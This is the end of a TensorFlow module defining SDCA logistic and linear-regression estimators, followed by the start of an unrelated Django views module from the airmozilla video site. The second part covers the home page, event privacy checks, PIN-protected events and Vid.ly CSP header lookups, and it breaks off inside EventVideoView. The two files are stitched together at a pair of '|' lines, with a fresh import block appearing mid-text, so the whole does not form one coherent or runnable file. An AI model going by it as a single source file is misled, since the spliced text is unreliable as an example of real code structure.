      l1_regularization: Global (across all examples) L1 regularization.
      l2_regularization: Global (across all examples) L2 regularization.
      num_loss_partitions: Number of partitions of the (global) loss
        function optimized by the underlying optimizer (SDCAOptimizer).
      config: `RunConfig` object to configure the runtime settings.
      feature_engineering_fn: Function mapping the (features, labels)
        produced by `input_fn` to the (features, labels) fed to the model.

    Raises:
      ValueError: if head is not supported by SDCA.
    """
    self._feature_columns = tuple(feature_columns or [])
    assert self._feature_columns

    if not _head_is_valid_for_sdca(head):
      raise ValueError(
          "head type: {} is not supported. Supported head types: "
          "_BinaryLogisticHead, _BinarySvmHead and _RegressionHead.".format(
              type(head)))
    assert head.logits_dimension == 1

    # All model configuration travels to sdca_model_fn via `params`,
    # including the hook that applies/shrinks weights after each step.
    super(_SDCAEstimator, self).__init__(
        model_fn=sdca_model_fn,
        model_dir=model_dir,
        config=config,
        params=dict(
            head=head,
            feature_columns=feature_columns,
            example_id_column=example_id_column,
            num_loss_partitions=num_loss_partitions,
            l1_regularization=l1_regularization,
            l2_regularization=l2_regularization,
            weight_column_name=weight_column_name,
            update_weights_hook=_SdcaUpdateWeightsHook(),
        ),
        feature_engineering_fn=feature_engineering_fn)
class SDCALogisticClassifier(_SDCAEstimator):
  """Logistic regression binary classifier using the SDCA optimizer.
  Example usage:
  ```python
  sparse_column_a = sparse_column_with_hash_bucket(...)
  sparse_column_b = sparse_column_with_hash_bucket(...)
  sparse_feature_a_x_sparse_feature_b = crossed_column(...)
  classifier = SDCALogisticClassifier(
      example_id_column='example_id',
      feature_columns=[sparse_column_a, sparse_feature_a_x_sparse_feature_b],
      weight_column_name=...,
      l2_regularization=...,
      num_loss_partitions=...,
  )
  # Input builders
  # returns x, y (where y is the label Tensor (with 0/1 values)
  def input_fn_{train, eval}:
  # returns x (features dict)
  def input_fn_test:
  ...
  classifier.fit(input_fn=input_fn_train)
  classifier.evaluate(input_fn=input_fn_eval)
  # Returns predicted classes.
  classifier.predict_classes(input_fn=input_fn_test)
  # Returns predicted probabilities.
  classifier.predict_proba(input_fn=input_fn_test)
  ```
  The input_fn provided to `fit`, `evaluate` and predict_* methods should return
  the following features, otherwise there will be a `KeyError`:
  * A feature with `key=example_id_column` whose value is a `Tensor` of dtype
    string.
  * If `weight_column_name` is not `None`, a feature with
    `key=weight_column_name` whose value is a `Tensor`.
  * For each `column` in `feature_columns`:
    - if `column` is a `SparseColumn`, a feature with `key=column.name` whose
      `value` is a `SparseTensor`
    - if `column` is a `RealValuedColumn`, a feature with `key=column.name`
      whose `value` is a `Tensor`
    - if `column` is a `WeightedSparseColumn`, two features: the first with
      `key` the id column name, the second with `key` the weight column name.
      Both features' `value` must be a `SparseTensor`
  """

  def __init__(self,
               example_id_column,
               feature_columns,
               weight_column_name=None,
               model_dir=None,
               l1_regularization=0.0,
               l2_regularization=1.0,
               num_loss_partitions=None,
               config=None,
               feature_engineering_fn=None):
    """Construct a `SDCALogisticClassifier` object.
    Args:
      example_id_column: A string defining the feature column name representing
        example ids. Used to initialize the underlying SDCA optimizer.
      feature_columns: An iterable containing all the feature columns used by
        the model. All items in the iterable should derive from `FeatureColumn`.
        Note that the order of the items is ignored at model construction time.
      weight_column_name: A string defining feature column name representing
        weights. It is used to downweight or boost examples during training. It
        will be multiplied by the loss of the example.
      model_dir: Directory to save model parameters, graph etc. This can also be
        used to load checkpoints from the directory into an estimator to
        continue training a previously saved model.
      l1_regularization: L1-regularization parameter. Refers to global L1
        regularization (across all examples).
      l2_regularization: L2-regularization parameter. Refers to global L2
        regularization (across all examples).
      num_loss_partitions: Number of partitions of the global loss function
        optimized by the underlying optimizer (SDCAOptimizer).
      config: `RunConfig` object to configure the runtime settings.
      feature_engineering_fn: Feature engineering function. Takes features and
        labels which are the output of `input_fn` and returns features and
        labels which will be fed into the model.
    Returns:
      A `SDCALogisticClassifier` estimator.
    """
    # A binary logistic head (n_classes=2) makes the base class use
    # "logistic_loss" in sdca_model_fn.
    super(SDCALogisticClassifier, self).__init__(
        example_id_column=example_id_column,
        feature_columns=feature_columns,
        weight_column_name=weight_column_name,
        model_dir=model_dir,
        head=head_lib.multi_class_head(
            n_classes=2, weight_column_name=weight_column_name),
        l1_regularization=l1_regularization,
        l2_regularization=l2_regularization,
        num_loss_partitions=num_loss_partitions,
        config=config,
        # Fixed: this used to be hard-coded to None, which silently
        # discarded the caller-supplied feature_engineering_fn.
        feature_engineering_fn=feature_engineering_fn)

  def predict_classes(self, input_fn=None):
    """Runs inference to determine the predicted class.
    Args:
      input_fn: The input function providing features.
    Returns:
      A generator of predicted classes for the features provided by input_fn.
    """
    key = prediction_key.PredictionKey.CLASSES
    predictions = super(SDCALogisticClassifier, self).predict(
        input_fn=input_fn, outputs=[key])
    return (pred[key] for pred in predictions)

  def predict_proba(self, input_fn=None):
    """Runs inference to determine the class probability predictions.
    Args:
      input_fn: The input function providing features.
    Returns:
      A generator of predicted class probabilities for the features provided by
        input_fn.
    """
    key = prediction_key.PredictionKey.PROBABILITIES
    predictions = super(SDCALogisticClassifier, self).predict(
        input_fn=input_fn, outputs=[key])
    return (pred[key] for pred in predictions)
class SDCALinearRegressor(_SDCAEstimator):
  """Linear regression model using SDCA to solve the underlying optimization.
  Example usage:
  ```python
  real_column_a = real_valued_column(...)
  sparse_column_b = sparse_column_with_hash_bucket(...)
  regressor = SDCALinearRegressor(
      example_id_column='example_id',
      feature_columns=[real_column_a, sparse_column_b],
      weight_column_name=...,
      l2_regularization=...,
      num_loss_partitions=...,
  )
  # Input builders
  # returns x, y (where y is the label Tensor (with 0/1 values)
  def input_fn_{train, eval}:
  # returns x (features dict)
  def input_fn_test:
  ...
  regressor.fit(input_fn=input_fn_train)
  regressor.evaluate(input_fn=input_fn_eval)
  regressor.predict_scores(input_fn=input_fn_test) # returns predicted scores.
  ```
  The input_fn provided to `fit`, `evaluate` and predict_* methods should return
  the following features, otherwise there will be a `KeyError`:
  * A feature with `key=example_id_column` whose value is a `Tensor` of dtype
    string.
  * If `weight_column_name` is not `None`, a feature with
    `key=weight_column_name` whose value is a `Tensor`.
  * For each `column` in `feature_columns`:
    - if `column` is a `SparseColumn`, a feature with `key=column.name` whose
      `value` is a `SparseTensor`
    - if `column` is a `RealValuedColumn`, a feature with `key=column.name`
      whose `value` is a `Tensor`
    - if `column` is a `WeightedSparseColumn`, two features: the first with
      `key` the id column name, the second with `key` the weight column name.
      Both features' `value` must be a `SparseTensor`
  """

  def __init__(self,
               example_id_column,
               feature_columns,
               weight_column_name=None,
               model_dir=None,
               l1_regularization=0.0,
               l2_regularization=1.0,
               num_loss_partitions=None,
               config=None,
               feature_engineering_fn=None):
    """Construct a `SDCALinearRegressor` estimator object.
    Args:
      example_id_column: A string defining the feature column name representing
        example ids. Used to initialize the underlying SDCA optimizer.
      feature_columns: An iterable containing all the feature columns used by
        the model. All items in the iterable should derive from `FeatureColumn`.
        Note that the order of the items is ignored at model construction time.
      weight_column_name: A string defining feature column name representing
        weights. It is used to down weight or boost examples during training. It
        will be multiplied by the loss of the example.
      model_dir: Directory to save model parameters, graph etc. This can also be
        used to load checkpoints from the directory into an estimator to
        continue training a previously saved model.
      l1_regularization: L1-regularization parameter. Refers to global L1
        regularization (across all examples).
      l2_regularization: L2-regularization parameter. Refers to global L2
        regularization (across all examples).
      num_loss_partitions: number of partitions of the (global) loss function
        optimized by the underlying optimizer (SDCAOptimizer).
      config: `RunConfig` object to configure the runtime settings.
      feature_engineering_fn: Feature engineering function. Takes features and
        labels which are the output of `input_fn` and returns features and
        labels which will be fed into the model.
    Returns:
      A `SDCALinearRegressor` estimator.
    """
    # A regression head makes the base class use "squared_loss" in
    # sdca_model_fn.
    super(SDCALinearRegressor, self).__init__(
        example_id_column=example_id_column,
        feature_columns=feature_columns,
        weight_column_name=weight_column_name,
        model_dir=model_dir,
        head=head_lib.regression_head(weight_column_name=weight_column_name),
        l1_regularization=l1_regularization,
        l2_regularization=l2_regularization,
        num_loss_partitions=num_loss_partitions,
        config=config,
        # Fixed: this used to be hard-coded to None, which silently
        # discarded the caller-supplied feature_engineering_fn.
        feature_engineering_fn=feature_engineering_fn)

  def predict_scores(self, input_fn):
    """Returns predicted scores for given features.
    Args:
      input_fn: The input function providing features.
    Returns:
      A generator of predicted scores for the features provided by input_fn.
    """
    key = prediction_key.PredictionKey.SCORES
    predictions = super(SDCALinearRegressor, self).predict(
        input_fn=input_fn, outputs=[key])
    return (pred[key] for pred in predictions)
|
|
import datetime
import hashlib
import urllib
import time
import collections
import urlparse
import requests
from django import http
from django.conf import settings
from django.contrib.sites.requests import RequestSite
from django.shortcuts import get_object_or_404, redirect, render
from django.core.cache import cache
from django.views.decorators.cache import never_cache
from django.views.generic.base import View
from django.db.models import Count, Q, F
from django.db import transaction
from django.core.urlresolvers import reverse
from django.template import engines
from django.utils import timezone
from jsonview.decorators import json_view
from airmozilla.main.models import (
Event,
EventOldSlug,
Tag,
Channel,
EventHitStats,
CuratedGroup,
Picture,
VidlySubmission,
EventLiveHits,
Chapter,
VidlyTagDomain,
)
from airmozilla.base.utils import (
paginate,
edgecast_tokenize,
akamai_tokenize,
)
from airmozilla.main.templatetags.jinja_helpers import thumbnail
from airmozilla.search.models import LoggedSearch
from airmozilla.comments.models import Discussion
from airmozilla.surveys.models import Survey
# from airmozilla.subtitles.models import AmaraVideo
from airmozilla.closedcaptions.models import ClosedCaptionsTranscript
from airmozilla.manage import vidly
from airmozilla.manage import related
from airmozilla.base import mozillians
from airmozilla.staticpages.views import staticpage
from airmozilla.main import cloud
from airmozilla.main.views import is_contributor, is_employee
from airmozilla.main import forms
def page(request, template):
    """Base page: renders templates bare, used for static pages.

    `template` is a template path rendered with no extra context
    (only the context processors apply).
    """
    return render(request, template)
def home(request, page=1, channel_slug=settings.DEFAULT_CHANNEL_SLUG):
    """Paginated recent videos and live videos.

    Renders one page (of 10) of archived events for `channel_slug`, plus
    any currently-live events, filtered by the requesting user's privacy
    level and optional `?tag=` query parameters.
    """
    channels = Channel.objects.filter(slug=channel_slug)
    if not channels.count():
        if channel_slug == settings.DEFAULT_CHANNEL_SLUG:
            # then, the Main channel hasn't been created yet
            Channel.objects.create(
                name=settings.DEFAULT_CHANNEL_NAME,
                slug=settings.DEFAULT_CHANNEL_SLUG
            )
            channels = Channel.objects.filter(slug=channel_slug)
        else:
            raise http.Http404('Channel not found')
    request.channels = channels
    # Privacy: anonymous users see only approved, non-company events;
    # contributors see everything except company-private events;
    # other active (staff) users see everything.
    privacy_filter = {}
    privacy_exclude = {}
    archived_events = Event.objects.archived()
    if request.user.is_active:
        if is_contributor(request.user):
            privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
    else:
        # privacy_filter = {'privacy': Event.PRIVACY_PUBLIC}
        privacy_exclude = {'privacy': Event.PRIVACY_COMPANY}
        archived_events = archived_events.approved()
    if privacy_filter:
        archived_events = archived_events.filter(**privacy_filter)
    elif privacy_exclude:
        archived_events = archived_events.exclude(**privacy_exclude)
    archived_events = archived_events.order_by('-start_time')
    archived_events = archived_events.select_related('picture')
    found_tags = []
    if request.GET.getlist('tag'):
        requested_tags = request.GET.getlist('tag')
        for each in requested_tags:
            found_tags.extend(Tag.objects.filter(name__iexact=each))
        if len(found_tags) < len(requested_tags):
            # invalid tags were used in the query string;
            # permanently redirect to a URL containing only the valid ones
            url = reverse('main:home')
            if found_tags:
                # some were good
                url += '?%s' % urllib.urlencode({
                    'tag': [x.name for x in found_tags]
                }, True)
            return redirect(url, permanent=True)
        archived_events = archived_events.filter(tags__in=found_tags)
    if found_tags:
        # no live events when filtering by tag
        live_events = Event.objects.none()
    else:
        live_events = (Event.objects.live()
                       .order_by('start_time'))
        if not request.user.is_active:
            live_events = live_events.approved()
        if privacy_filter:
            live_events = live_events.filter(**privacy_filter)
        elif privacy_exclude:
            live_events = live_events.exclude(**privacy_exclude)
        # apply the mandatory channels filter
        # but only do this if it's not filtered by tags
        live_events = live_events.filter(channels=channels)
        archived_events = archived_events.filter(channels=channels)
        live_events = live_events.select_related('picture')
    if channels and channels[0].reverse_order:
        archived_events = archived_events.reverse()
    archived_paged = paginate(archived_events, page, 10)
    # to simplify the complexity of the template when it tries to make the
    # pagination URLs, we just figure it all out here
    next_page_url = prev_page_url = None
    channel = channels[0]
    if archived_paged.has_next():
        if channel.slug == settings.DEFAULT_CHANNEL_SLUG:
            next_page_url = reverse(
                'main:home',
                args=(archived_paged.next_page_number(),)
            )
        else:
            next_page_url = reverse(
                'main:home_channels',
                args=(channel.slug,
                      archived_paged.next_page_number())
            )
    if archived_paged.has_previous():
        if channel.slug == settings.DEFAULT_CHANNEL_SLUG:
            prev_page_url = reverse(
                'main:home',
                args=(archived_paged.previous_page_number(),)
            )
        else:
            prev_page_url = reverse(
                'main:home_channels',
                args=(channel.slug,
                      archived_paged.previous_page_number())
            )
    # Separate queryset used only to compute per-child-channel counts
    # and the feed privacy level for this user.
    events_qs = Event.objects.archived().all()
    if request.user.is_active:
        if is_contributor(request.user):
            feed_privacy = 'contributors'
            events_qs = events_qs.exclude(privacy=Event.PRIVACY_COMPANY)
        else:
            feed_privacy = 'company'
    else:
        events_qs = events_qs.filter(privacy=Event.PRIVACY_PUBLIC)
        feed_privacy = 'public'
    channel_children = []
    for child in channel.get_children().order_by('name'):
        channel_children.append((
            child,
            events_qs.filter(channels=child).count()
        ))
    # Pre-fetch all curated group names in one query and expose a lookup
    # callable to the template instead of querying per event.
    curated_groups_map = collections.defaultdict(list)
    curated_groups = (
        CuratedGroup.objects.all()
        .values_list('event_id', 'name')
        .order_by('name')
    )
    for event_id, name in curated_groups:
        curated_groups_map[event_id].append(name)
    def get_curated_groups(event):
        # Returns the list of group names, or None if the event has none.
        return curated_groups_map.get(event.id)
    context = {
        'events': archived_paged,
        'live_events': live_events,
        'tags': found_tags,
        'Event': Event,
        'channel': channel,
        'channel_children': channel_children,
        'feed_privacy': feed_privacy,
        'next_page_url': next_page_url,
        'prev_page_url': prev_page_url,
        'get_curated_groups': get_curated_groups,
    }
    return render(request, 'main/home.html', context)
def can_view_event(event, user):
    """return True if the current user has right to view this event

    Rules as implemented below:
      * public events: everyone
      * any non-public event: requires an active (logged-in) user
      * company-private events: active non-contributors only
      * otherwise (e.g. contributor-level events): staff always allowed;
        contributors fall through to the curated-group check below
    """
    if event.privacy == Event.PRIVACY_PUBLIC:
        return True
    elif not user.is_active:
        return False
    # you're logged in
    if event.privacy == Event.PRIVACY_COMPANY:
        # but then it's not good enough to be contributor
        if is_contributor(user):
            return False
    else:
        if not is_contributor(user):
            # staff can always see it
            return True
    # NOTE(review): this check runs at function level (not inside the
    # `else:` above), so it also applies to staff viewing company-private
    # events — confirm that is intended.
    curated_groups = [
        x[0] for x in
        CuratedGroup.objects.filter(event=event).values_list('name')
    ]
    if curated_groups:
        # Event restricted to curated groups: allow if the user belongs
        # to at least one of them (looked up via mozillians).
        return any(
            [mozillians.in_group(user.email, x) for x in curated_groups]
        )
    return True
class EventView(View):
    """Video, description, and other metadata.

    Main event-detail page. GET renders the event (or an appropriate
    error/login/pin page); POST handles the PIN form for pin-protected
    events. Subclasses override the cant_view/cant_find/can_view hooks.
    """
    # Default template; get() may swap it (not-scheduled page, pin page).
    template_name = 'main/event.html'
    def cant_view_event(self, event, request):
        """return a response appropriate when you can't view the event"""
        if request.user.is_authenticated():
            return redirect('main:permission_denied', event.slug)
        else:
            # anonymous: send to login with a `next` back to this event
            desired_url = reverse('main:event', args=(event.slug,))
            url = reverse('main:login')
            return redirect('%s?next=%s' % (url, urllib.quote(desired_url)))
    def cant_find_event(self, request, slug):
        """return an appropriate response if no event can be found"""
        # Fall back to serving a static page with the same slug, if any.
        return staticpage(request, slug)
    def can_view_event(self, event, request):
        """wrapper on the utility function can_view_event()"""
        return can_view_event(event, request.user)
    def get_default_context(self, event, request):
        """Return base context with iframe embed snippets for the event."""
        context = {}
        prefix = request.is_secure() and 'https' or 'http'
        root_url = '%s://%s' % (prefix, RequestSite(request).domain)
        url = reverse('main:event_video', kwargs={'slug': event.slug})
        absolute_url = root_url + url
        context['embed_code'] = (
            '<iframe src="%s" '
            'width="640" height="380" frameborder="0" allowfullscreen>'
            '</iframe>'
            % absolute_url
        )
        context['embed_code_big'] = (
            '<iframe src="%s" '
            'width="896" height="524" frameborder="0" allowfullscreen>'
            '</iframe>'
            % absolute_url
        )
        return context
    def get_event(self, slug, request):
        """Resolve `slug` to an Event.

        NOTE: returns either an Event, or an HttpResponse (redirect for an
        old slug, or the cant_find_event fallback) — callers must check
        the type (see get()).
        """
        try:
            return Event.objects.get(slug=slug)
        except Event.DoesNotExist:
            try:
                # case-insensitive retry
                return Event.objects.get(slug__iexact=slug)
            except Event.DoesNotExist:
                try:
                    old_slug = EventOldSlug.objects.get(slug=slug)
                    return redirect('main:event', slug=old_slug.event.slug)
                except EventOldSlug.DoesNotExist:
                    # does it exist as a static page
                    if slug.isdigit():
                        # it might be the ID of the event
                        try:
                            return Event.objects.get(id=slug)
                        except Event.DoesNotExist:
                            # not that either
                            pass
                    return self.cant_find_event(request, slug)
    @staticmethod
    def get_vidly_information(event, tag):
        """Return (vidly_tag, hd) for the event, cached for one hour.

        Both values are None when the event has no usable Vid.ly setup
        (pending/processing, non-public, or no vidly template/tag).
        """
        cache_key = 'event_vidly_information-{}'.format(event.id)
        from_cache = cache.get(cache_key)
        if from_cache is not None:
            return from_cache
        # It was not cached, we have to figure it out
        vidly_tag = hd = None
        if (
            not (event.is_pending() or event.is_processing()) and
            event.is_public() and
            event.has_vidly_template() and event.template_environment
        ):
            if event.template_environment.get('tag'):
                vidly_tag = tag or event.template_environment['tag']
                hd = False  # default
                # Take the HD flag from the most recent submission only.
                vidly_submissions = (
                    VidlySubmission.objects
                    .filter(event=event, tag=vidly_tag)
                    .order_by('-submission_time')
                )
                for vidly_submission in vidly_submissions.values('hd'):
                    hd = vidly_submission['hd']
                    break
        cache.set(cache_key, (vidly_tag, hd), 60 * 60)
        return vidly_tag, hd
    def get(self, request, slug):
        event = self.get_event(slug, request)
        # get_event may have produced a redirect or fallback response
        if isinstance(event, http.HttpResponse):
            return event
        if not self.can_view_event(event, request):
            return self.cant_view_event(event, request)
        tag = request.GET.get('tag')
        warning = None
        ok_statuses = (
            Event.STATUS_SCHEDULED,
            Event.STATUS_PENDING,
            Event.STATUS_PROCESSING,
        )
        if event.status not in ok_statuses:
            # non-superusers get the "not scheduled" page;
            # superusers see the event with a warning banner
            if not request.user.is_superuser:
                self.template_name = 'main/event_not_scheduled.html'
            else:
                warning = "Event is not publicly visible - not scheduled."
        if event.approval_set.filter(approved=False).exists():
            if not request.user.is_active:
                return http.HttpResponse('Event not approved')
            else:
                warning = "Event is not publicly visible - not yet approved."
        hits = None
        # assume this to false to start with
        can_edit_chapters = False
        template_tagged = ''
        if event.template and not event.is_upcoming():
            # The only acceptable way to make autoplay be on
            # is to send ?autoplay=true
            # All other attempts will switch it off.
            autoplay = request.GET.get('autoplay', 'false') == 'true'
            try:
                template_tagged = get_video_tagged(
                    event,
                    request,
                    autoplay=autoplay,
                    tag=tag,
                )
            except VidlySubmission.DoesNotExist:
                return http.HttpResponseBadRequest(
                    'Tag %s does not exist for this event' % (tag,)
                )
            stats_query = (
                EventHitStats.objects.filter(event=event)
                .values_list('total_hits', flat=True)
            )
            for total_hits in stats_query:
                hits = total_hits
            # if the event has a template is not upcoming
            if not event.is_live() and event.is_scheduled():
                # ...and is not live, then
                if request.user.is_active:
                    can_edit_chapters = True
        can_manage_edit_event = (
            request.user.is_active and
            request.user.is_staff and
            request.user.has_perm('main.change_event')
        )
        can_edit_event = request.user.is_active
        can_edit_discussion = (
            can_edit_event and
            # This is a little trick to avoid waking up the
            # SimpleLazyObject on the user. If the .is_active is true
            # the ID will have already been set by the session.
            # So doing this comparison instead avoids causing a
            # select query on the auth_user table.
            request.user.pk == event.creator_id and
            Discussion.objects.filter(event=event).exists()
        )
        request.channels = event.channels.all()
        # needed for the open graph stuff
        event.url = reverse('main:event', args=(event.slug,))
        context = self.get_default_context(event, request)
        context.update({
            'event': event,
            'video': template_tagged,
            'warning': warning,
            'can_manage_edit_event': can_manage_edit_event,
            'can_edit_event': can_edit_event,
            'can_edit_discussion': can_edit_discussion,
            'can_edit_chapters': can_edit_chapters,
            'Event': Event,
            'hits': hits,
            'tags': [t.name for t in event.tags.all()],
            'channels': request.channels,
            # needed for the _event_privacy.html template
            'curated_groups': CuratedGroup.get_names(event),
        })
        context['chapters'] = Chapter.objects.filter(
            event=event,
            is_active=True,
        )
        # By default, we want to hint in the DOM that this is an HD
        # video.
        context['hd'] = event.is_scheduled() and not event.is_upcoming()
        vidly_tag, vidly_hd = self.get_vidly_information(event, tag)
        if vidly_tag:
            context['vidly_tag'] = vidly_tag
            context['vidly_hd'] = vidly_hd
            if not vidly_hd:
                context['hd'] = False
        # If the event is in the processing state (or pending), we welcome
        # people to view it but it'll say that the video isn't ready yet.
        # But we'll also try to include an estimate of how long we think
        # it will take until it's ready to be viewed.
        context['estimated_time_left'] = None
        context['time_run'] = None
        if (
            (event.is_processing() or event.is_pending()) and
            event.duration and
            event.template_environment.get('tag')
        ):
            vidly_submissions = (
                VidlySubmission.objects
                .filter(event=event, tag=event.template_environment.get('tag'))
                .order_by('-submission_time')
            )
            for vidly_submission in vidly_submissions[:1]:
                context['estimated_time_left'] = (
                    vidly_submission.get_estimated_time_left()
                )
                context['time_run'] = (
                    (
                        timezone.now() - vidly_submission.submission_time
                    ).seconds
                )
        if event.pin:
            # Employees bypass the PIN; everyone else must have entered it
            # earlier in this session (see post()).
            if (
                not request.user.is_authenticated() or
                not is_employee(request.user)
            ):
                entered_pins = request.session.get('entered_pins', [])
                if event.pin not in entered_pins:
                    self.template_name = 'main/event_requires_pin.html'
                    context['pin_form'] = forms.PinForm()
        try:
            context['discussion'] = Discussion.objects.get(event=event)
            # The name of the channel we publish to fanout on when there's
            # changes to this events comments.
            context['subscription_channel_comments'] = 'comments-{}'.format(
                event.id
            )
        except Discussion.DoesNotExist:
            context['discussion'] = {'enabled': False}
        context['subscription_channel_status'] = 'event-{}'.format(event.id)
        # amara_videos = AmaraVideo.objects.filter(
        #     event=event,
        #     transcript__isnull=False,
        # )
        # context['amara_video'] = None
        # for amara_video in amara_videos.order_by('-modified')[:1]:
        #     context['amara_video'] = amara_video
        context['closedcaptions'] = None
        for connection in ClosedCaptionsTranscript.objects.filter(event=event):
            assert connection.closedcaptions.transcript
            context['closedcaptions'] = connection.closedcaptions
        # -1 is the "not known in cache" sentinel (None means "no survey")
        cache_key = 'event_survey_id_%s' % event.id
        context['survey_id'] = cache.get(cache_key, -1)
        if context['survey_id'] == -1:  # not known in cache
            try:
                survey = Survey.objects.get(
                    events=event,
                    active=True
                )
                cache.set(cache_key, survey.id, 60 * 60 * 24)
                context['survey_id'] = survey.id
            except Survey.DoesNotExist:
                cache.set(cache_key, None, 60 * 60 * 24)
                context['survey_id'] = None
        if settings.LOG_SEARCHES:
            if request.session.get('logged_search'):
                pk, time_ago = request.session.get('logged_search')
                age = time.time() - time_ago
                if age <= 5:
                    # the search was made less than 5 seconds ago
                    try:
                        logged_search = LoggedSearch.objects.get(pk=pk)
                        logged_search.event_clicked = event
                        logged_search.save()
                    except LoggedSearch.DoesNotExist:
                        pass
        response = render(request, self.template_name, context)
        self._set_csp_update(response, event)
        return response
    def _set_csp_update(self, response, event):
        """Hack alert!
        We need to, potentially, update the CSP at run time if the
        video you're trying to watch is a Vid.ly video.
        Vid.ly is embedded by simply using `https://vid.ly/:shortcode`
        but internally they will redirect to a AWS CloudFront domain
        which we might not have prepared in our CSP settings.
        So let's update that on the fly.
        """
        cache_key = 'custom_csp_update:{}'.format(event.id)
        update = cache.get(cache_key)
        if update is not None:
            # it was set, use that and exit early
            if update:
                response._csp_update = update
            return
        # Guard clauses: only archived, scheduled Vid.ly events with a tag
        # need a CSP update.
        if not event.template:
            return
        if event.is_upcoming() or event.is_live() or not event.is_scheduled():
            return
        if 'vid.ly' not in event.template.name.lower():
            return
        if not event.template_environment.get('tag'):
            return
        tag = event.template_environment['tag']
        update = get_vidly_csp_headers(tag, private=not event.is_public())
        cache.set(cache_key, update, 60 * 60)
        # Now we've figured out what headers to update, set it on the response
        if update:
            response._csp_update = update
    def post(self, request, slug):
        """Handle the PIN form for pin-protected events."""
        event = get_object_or_404(Event, slug=slug)
        pin_form = forms.PinForm(request.POST, instance=event)
        if pin_form.is_valid():
            # Remember the correct PIN in the session so get() lets the
            # user through from now on.
            entered_pins = self.request.session.get('entered_pins', [])
            pin = pin_form.cleaned_data['pin']
            if pin not in entered_pins:
                entered_pins.append(pin)
                request.session['entered_pins'] = entered_pins
            return redirect('main:event', slug=slug)
        context = {
            'event': event,
            'pin_form': pin_form,
        }
        return render(request, 'main/event_requires_pin.html', context)
def get_vidly_csp_headers(tag, private=False):
    """Return a dict of CSP directives ('media-src', 'img-src',
    'connect-src') that should be added so the Vid.ly CDN domains for
    `tag` are allowed.

    For private videos a short-lived token is appended to the lookup
    URLs. Resolved domains are persisted in VidlyTagDomain so we don't
    repeat the HEAD requests.
    """
    token = None
    if private:
        token = vidly.tokenize(tag, 90)
    headers = {}
    def get_netloc(type_, url_format):
        # Resolve (and persist) the CDN domain for one resource type
        # ('webm' or 'poster'); returns None if it can't be determined.
        netloc = None
        try:
            found = VidlyTagDomain.objects.get(
                tag=tag,
                type=type_,
            )
            if found.private != private:
                # The tag has changed!
                found.delete()
                raise VidlyTagDomain.DoesNotExist
            elif found.domain == 'm.vid.ly':  # pragma: no cover
                # In a previous life, airmozilla might have attempted to
                # look up what the CDN domain was and if it failed,
                # Vid.ly would just redirect to 'https://m.vid.ly' which
                # is NOT the right CDN domain. We shouldn't have stored
                # that.
                # This knowledge was added in June 2017 and from now on
                # we never save this as the domain so it should cease.
                found.delete()
                raise VidlyTagDomain.DoesNotExist
            else:
                netloc = found.domain
        except VidlyTagDomain.DoesNotExist:
            # Not known yet: ask Vid.ly and read the redirect Location.
            url = url_format.format(
                tag
            )
            if token:
                url += '&token={}'.format(token)
            head_response = requests.head(url)
            if head_response.status_code == 302:
                if head_response.headers['Location'] == 'https://m.vid.ly':
                    # Basically, it didn't work.
                    # When vid.ly can't redirect to the actual file, for
                    # some reason it instead redirects to the exact
                    # URL 'https://m.vid.ly'. For example:
                    #
                    #  curl -v https://vid.ly/l1c2w5/blalbla
                    #  ...
                    #  < HTTP/1.1 302 Found
                    #  ...
                    #  < Location: https://m.vid.ly
                    #
                    # Odd right? But it basically means to use that we
                    # we not able to do the lookup. Sorry.
                    return
                netloc = urlparse.urlparse(
                    head_response.headers['Location']
                ).netloc
                assert netloc, head_response.headers['Location']
                VidlyTagDomain.objects.create(
                    tag=tag,
                    type=type_,
                    private=private,
                    domain=netloc,
                )
        return netloc
    media_netloc = get_netloc('webm', settings.VIDLY_VIDEO_URL_FORMAT)
    if media_netloc:
        headers['media-src'] = media_netloc
        # In almost all cases, the poster image is on the same domain
        # as the video. So let's use that.
        # Later we're going to try to do a specific lookup for the poster.
        # If that's better/different that becomes the added domain
        # for 'img-src' instead.
        headers['img-src'] = media_netloc
        # There is no way to pre-lookup what the actual CDN domain is
        # for the webvtt.vtt file is so let's hope for the best and
        # reuse the the domain for media on the connect-src too.
        headers['connect-src'] = media_netloc
    lock_cache_key = 'poster_netloc_failed:{}'.format(tag)
    if not cache.get(lock_cache_key):
        img_netloc = get_netloc('poster', settings.VIDLY_POSTER_URL_FORMAT)
        if img_netloc:
            headers['img-src'] = img_netloc
        else:
            # If that failed, don't bother trying again. For a while.
            cache.set(lock_cache_key, True, 60 * 60)
    return headers
class EventByIDView(EventView):
    """Look an event up by numeric ID and bounce to its slug URL."""

    def get(self, request, id):
        # 404 on unknown ids; permission check mirrors EventView.get().
        event = get_object_or_404(Event, id=id)
        if self.can_view_event(event, request):
            return redirect('main:event', event.slug)
        return self.cant_view_event(event, request)
def get_video_tagged(event, request, autoplay=False, tag=None):
    """Render the event's video template and return the resulting markup.

    The event's `template.content` is rendered with a context containing
    the event, tokenizer helpers and the event's own template_environment.

    Args:
        event: the Event whose template should be rendered.
        request: the current HttpRequest (exposed to the template).
        autoplay: when True, the template's `autoplay` variable is the
            string 'true' (it is consumed by javascript), otherwise 'false'.
        tag: optional Vid.ly tag to render with instead of the default.

    Raises:
        VidlySubmission.DoesNotExist: if `tag` is given but no submission
            with that tag exists for this event.
    """
    def poster_url(geometry='896x504', crop='center'):
        # Prefer the curated picture; fall back to the placeholder image.
        image = event.picture and event.picture.file or event.placeholder_img
        return thumbnail(image, geometry, crop=crop).url
    context = {
        'md5': lambda s: hashlib.md5(s).hexdigest(),
        'event': event,
        'request': request,
        'datetime': datetime.datetime.utcnow(),
        'vidly_tokenize': vidly.tokenize,
        'edgecast_tokenize': edgecast_tokenize,
        'akamai_tokenize': akamai_tokenize,
        'popcorn_url': event.popcorn_url,
        'autoplay': autoplay and 'true' or 'false',  # javascript
        'poster_url': poster_url,
    }
    if isinstance(event.template_environment, dict):
        context.update(event.template_environment)
    if tag:
        submissions = VidlySubmission.objects.filter(
            tag=tag,
            event=event
        )
        if not submissions.exists():
            raise VidlySubmission.DoesNotExist(tag)
        context['tag'] = tag
    template = engines['backend'].from_string(event.template.content)
    try:
        template_tagged = template.render(context)
    # Fixed: was `except vidly.VidlyTokenizeError, msg:` — the comma form
    # is a SyntaxError on Python 3; `as` works on Python 2.6+ and 3.
    except vidly.VidlyTokenizeError as msg:
        template_tagged = '<code style="color:red">%s</code>' % msg
    return template_tagged
class EventVideoView(EventView):
    """Standalone (embeddable) video page for a single event."""

    template_name = 'main/event_video.html'

    def can_view_event(self, event, request):
        if not self.embedded:
